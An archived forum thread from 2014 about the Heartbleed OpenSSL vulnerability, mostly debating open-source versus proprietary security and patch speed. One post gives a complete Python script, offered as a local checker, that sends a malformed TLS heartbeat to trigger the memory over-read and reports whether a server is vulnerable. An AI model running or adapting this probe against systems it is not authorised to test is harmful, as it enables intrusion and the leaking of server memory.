1. OCAU Merchandise is available! Check out our 20th Anniversary Mugs, Classic Logo Shirts and much more! Discussion in this thread.
    Dismiss Notice

Heartbleed SSL exploit [CVE-2014-0160]

Discussion in 'Business & Enterprise Computing' started by HeXa, Apr 9, 2014.

  1. PabloEscobar

    PabloEscobar Member

    Joined:
    Jan 28, 2008
    Messages:
    14,678
    Not Trolling.

    The argument for security of open source software, (and why you can never trust closed source) that gets oft repeated goes something along the lines of

    "You can trust OpenSourceX because the source is open man, everyone has access to it... how could a TLA hide a backdoor in something thats open. Bugs like <insert whatever MS flavour of the week bug> cannot happen with Open Source because anyone can look at the source and fix it"

    and

    "You can't trust microsoft, LOOK, theres a variable called _NSAKEY that contains a 1024bit key, that must be the backdoor that the NSA put in so they can use your webcam to view your cat remotely. Sure, they say that the _NSAKEY is to ensure they comply with crypto-export guidelines, but you don't know man YOU JUST DON'T KNOW"

    So, to answer your question... XP Remote exploit bugs can be there for 10 years, because only BillyG (and his 4 friends) are allowed to see the code.

    My question was simply around the validity of the Open Source argument presented above.

    Bugs happen, but for something so widely in use to be overlooked by so many people, I just can't see the "Its safe because its open" argument holding any weight whatsoever.
     
  2. silenthunter

    silenthunter Member

    Joined:
    Aug 29, 2002
    Messages:
    2,634
    Location:
    Amsterdam, Netherlands
    Here is a short python script you can use to test locally.

    Usage is python script.py URL

    Code:
    #!/usr/bin/python
    
    # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
    # The author disclaims copyright to this source code.
    
    # Modified for simplified checking by Yonathan Klijnsma
    
    import sys
    import struct
    import socket
    import time
    import select
    import re
    from optparse import OptionParser
    
    target = None
    
    options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
    
    def h2bin(x):
        return x.replace(' ', '').replace('\n', '').decode('hex')
    
    hello = h2bin('''
    16 03 02 00  dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    00 0f 00 01 01                                  
    ''')
    
    hb = h2bin(''' 
    18 03 02 00 03
    01 40 00
    ''')
    
    def hexdump(s):
        for b in xrange(0, len(s), 16):
            lin = [c for c in s[b : b + 16]]
            hxdat = ' '.join('%02X' % ord(c) for c in lin)
            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
            print '  %04x: %-48s %s' % (b, hxdat, pdat)
        print
    
    def recvall(s, length, timeout=5):
        endtime = time.time() + timeout
        rdata = ''
        remain = length
        while remain > 0:
            rtime = endtime - time.time() 
            if rtime < 0:
                return None
            r, w, e = select.select([s], [], [], 5)
            if s in r:
                data = s.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata
            
    
    def recvmsg(s):
        hdr = recvall(s, 5)
        if hdr is None:
            return None, None, None
        typ, ver, ln = struct.unpack('>BHH', hdr)
        pay = recvall(s, ln, 10)
        if pay is None:
            return None, None, None
     
        return typ, ver, pay
    
    def hit_hb(s):
        global target
        s.send(hb)
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print target + '|NOT VULNERABLE'
                return False
    
            if typ == 24:
                if len(pay) > 3:
                    print target + '|VULNERABLE'
                else:
                    print target + '|NOT VULNERABLE'
                return True
    
            if typ == 21:
                print target + '|NOT VULNERABLE'
                return False
    
    def main():
        global target
        opts, args = options.parse_args()
        if len(args) < 1:
            options.print_help()
            return
    
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        target = args[0]
        sys.stdout.flush()
        s.send(hello)
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ == None:
                return
            # Look for server hello done message.
            if typ == 22 and ord(pay[0]) == 0x0E:
                break
    
        sys.stdout.flush()
        s.send(hb)
        hit_hb(s)
    
    if __name__ == '__main__':
        main()
     
  3. OP
    OP
    HeXa

    HeXa Member

    Joined:
    Jul 7, 2001
    Messages:
    10,211
    Location:
    Canberra, ACT
    yep - Hanlon's Razor :p

    in their defence, C/C++ wasn't designed with memory safety in mind and it is up to the programmer (or commiter) to ensure adequate checks are in place

    not that I mind, buffer overflows are very useful for jailbreaking :Pirate:
     
  4. Daemon

    Daemon Member

    Joined:
    Jun 27, 2001
    Messages:
    5,475
    Location:
    qld.au
    Quite easily, it's C code. Any program which combines memory mapping with something as complex as cryptography means an extreme amount of checks are required.

    It's nothing to do with open source at all, in fact if you compare the incidents with propriety companies you'd see that it's just the same. Companies like Adobe, Apple, Microsoft, Oracle and so forth have all had many exploits involving improper memory handling. I'm sure we'll see multiples of them this year as well too.

    http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html

    Have a read of the code. Did you spot the error? How long did it take you? Now, how long does it take if there's a few hundred thousand lines of code?

    Any software written by a human is prone to error. Using a programming language where you have to explicitly handle the memory allocation means bugs like this will exist as the complexity grows.

    Open source and responsible vendors meant that despite the nature of this bug, the fix can be validated and rolled out rapidly. Many could (and did) recompile the code with the fix for anything critical within minutes of the announcement. Vendors like Redhat were only hours later.

    When was the last time that a fix was available that quick from Microsoft or Adobe?
     
  5. NSanity

    NSanity Member

    Joined:
    Mar 11, 2002
    Messages:
    18,647
    Location:
    Brisbane
    Umm, quite frequently?

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160

    Date Entry Created - 2013 12 03

    Yep, 4 months.

    Sure that date might not actually be when it was first found - but you can bet that the major players have known about it much longer than 2 days.
     
  6. Daemon

    Daemon Member

    Joined:
    Jun 27, 2001
    Messages:
    5,475
    Location:
    qld.au
    In case you missed the massive disclaimer beside the date, here it is again:

    CVE's are reserved in advance. Eg Look up CVE-0250 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0250) and you'll see the same date reserved. Of course, if you've ever monitored CVE's properly this is all fairly obvious...

    Now as to an affected vendor response. Here's the Red Hat bug: https://bugzilla.redhat.com/show_bug.cgi?id=1084875

    Reported: 2014-04-07 01:56:04 EDT
    Patched: 2014-04-07 02:14:33 EDT
    Released: 2014-04-07 13:43:21 EDT

    I think that the performance is fairly self explanatory.

    Edit: Just to compare to the recent vulnerabilities from Microsoft and Adobe. Microsoft have just released two critical patches, one of which is already out in the wild (CVE-2014-1761) and that they've known about for weeks. Adobe just released the patch for one of the priority 1 exploits discovered during Pwn2Own a month ago. Both are the highest rating for severity.
     
    Last edited: Apr 10, 2014
  7. elvis

    elvis OCAU's most famous and arrogant know-it-all

    Joined:
    Jun 27, 2001
    Messages:
    46,805
    Location:
    Brisbane
    The same way bugs everywhere else go undiscovered - people make assumptions and/or mistakes.

    There are outliers in every case. This is one.

    Compare and contrast the volume of critical bugs that are patched much more quickly, which never make the news because they're dealt with quickly and efficiently. Now compare that in open source versus proprietary systems - over the last 10 years I could name dozens of scary bugs in Windows that left it wide open for months at a time.

    "Open source" doesn't guarantee "bug free". That assumption is just silly. But on average, open source does a much better job with respect to security than proprietary systems do, even when you include rare instances like this one.

    Additionally, this is why open source has competing projects. People complain a lot about there being too many options in open source. "Why do we need GNUTLS as well as OpenSSL?" asks the newbie. Well, here's a great example why.

    One has to be pragmatic about all software. Open source is not perfect, and there have been some notable fuckups in the past (Debian's "random seed" SSH bug a few years back, for example). But I'd still bet my career on open source over proprietary for any serious Internet-facing requirement, based purely on numbers over the last decade.
     
  8. scrantic

    scrantic Member

    Joined:
    Apr 8, 2002
    Messages:
    1,780
    Location:
    3350
  9. power

    power Member

    Joined:
    Apr 20, 2002
    Messages:
    68,463
    Location:
    brisbane
    This site keeps updating, well worth keeping an eye on.

    http://www.cnet.com/how-to/which-sites-have-patched-the-heartbleed-bug/

    The list is growing.

    Dropbox Pass Vulnerability patched. Password change recommended

    Flickr Pass Vulnerability patched. Password change recommended

    Vimeo Pass Vulnerability patched. Password change recommended

    GoDaddy Pass Vulnerability patched. Password change recommended

    Reddit Pass Vulnerability patched. Password change recommended

    Instagram Pass Vulnerability patched. Password change recommended

    Tumblr Pass Vulnerability patched. Password change recommended

    Wikipedia Pass Vulnerability patched. Password change recommended
     
    Last edited: Apr 11, 2014
  10. PabloEscobar

    PabloEscobar Member

    Joined:
    Jan 28, 2008
    Messages:
    14,678
    To play Devils Advocate/PHB...

    Open source lets anyone search the source for bugs.
    Who is looking harder for bugs in old code...

    The developers who are more interested in implementing new features, than bug checking old code.

    ShadyGuystm who, upon finding a bug, can exploit it for fun and profit.

    If you report the bug, you might get a bounty and some kudos from the community, if you sell or exploit the bug, you get hookers and blow.

    Open source makes it trivial for ShadyGuystm to find and exploit bugs, and thats why we can't use it in PHBCorp. We will stick with our closed source solutions... that way, at least ShadyGuystm wont be handed the code on a plate.
     
  11. power

    power Member

    Joined:
    Apr 20, 2002
    Messages:
    68,463
    Location:
    brisbane
    I hate open source, because hackers.
     
  12. millsy

    millsy Member

    Joined:
    Mar 31, 2007
    Messages:
    14,046
    Location:
    Brisbane
    Did... did you just advocate for security through obscurity? :lol:
     
  13. PabloEscobar

    PabloEscobar Member

    Joined:
    Jan 28, 2008
    Messages:
    14,678
    As I said, Pointy Haired Boss hat on...
    It's a pretty common opinion (regardless of the truth or not behind it) that needs to be overcome if I want to implement any open source things in the future.

    Out of all our systems here, An appliance, built on CentOS is the only one that was vulnerable... so yes, this is a setback to any future attempts at implementing open source in my environment.

    Its certainly a layer of security... so yes, I guess I did.

    Something that is obscure, is more secure than that same something that is not obscure. (completely separate to the inherent security of said 'something')
     
  14. millsy

    millsy Member

    Joined:
    Mar 31, 2007
    Messages:
    14,046
    Location:
    Brisbane
    I wholeheartedly disagree on that point, to be honest. What about MS08-067? What about the raft of other microsoft bugs that have come out of obscure, closed source or poorly documented API's.

    SCADA vulnerabilities, stuxnet, etc.

    The I'm making point is that one security vulnerability is hardly a reason to say that the FOSS model is inherently insecure, certainly no more than any other closed source model.

    Unfortunately when you're dealing with complex code (which this was) mistakes can be made that no one is going to notice.

    I get it's a pointy haired opinion, but the only way to move through that is with a sensible discussion.
     
  15. cbb1935

    cbb1935 Guest

    You'll have to excuse.my layman's comment.

    So if sites like Facebook and dropbox are vulnerable, and now patched. Is anything required from a user perspective, and what's the risk of nit changing passwords, if the accounts rarely used (or is that precautionary?).

    On another note, looks like a major site we use is affected, and no indication when it'll be patched. Looks like I have to tell some people they can't work.
     
  16. millsy

    millsy Member

    Joined:
    Mar 31, 2007
    Messages:
    14,046
    Location:
    Brisbane
    My understanding is if someone captured the encrypted traffic where you authenticated to facebook, then they could decrypt it and retrieve your password.
     
  17. power

    power Member

    Joined:
    Apr 20, 2002
    Messages:
    68,463
    Location:
    brisbane
    from a laymans perspective you need to know this.

    Ars were aware of the bug due to suspicious activity.

    Dear readers, please change your Ars account passwords ASAP

     
  18. Daemon

    Daemon Member

    Joined:
    Jun 27, 2001
    Messages:
    5,475
    Location:
    qld.au
    In fact, one of the strong reasons open source code is useful is when there is a bug. Instead of having to wait for a vendor to correct the problem it can be either fixed in-house (and a patch submitted upstream) or other companies and developers may come up with a fix. This collaboration is what makes open source strong.

    The same goes for new feature requests, if you contact a vendor and ask for a feature to be added then you're at the whim of their schedule and what they determine to be a priority. If the code is open source then it gives you the flexibility to either develop the feature in-house or contract a developer to complete for you.

    And yes, I have (albeit on smaller codebases) forked code, fixed a bug or added a new feature and submitted this upstream. With systems like github, bitbucket and similar it makes it quite a simple task. The more advanced projects have automated testing via systems like TravisCI, so you can't submit the patch before it's fully tested and working too!
     
  19. millsy

    millsy Member

    Joined:
    Mar 31, 2007
    Messages:
    14,046
    Location:
    Brisbane
    Indeed, the process of patching for a lot of places has been staggeringly fast.
     
  20. PabloEscobar

    PabloEscobar Member

    Joined:
    Jan 28, 2008
    Messages:
    14,678
    Trust, but Verify is how I view the FOSS model. This bug demonstrates that there was to much trust, and to little verification. Everyone assumed OpenSSL was save, because everyone else was using it.

    Most companies don't have the resources to do a full audit of every line of code in their environment, Reliance on closed source outsources that responsibility.
     

Share This Page

Advertisement: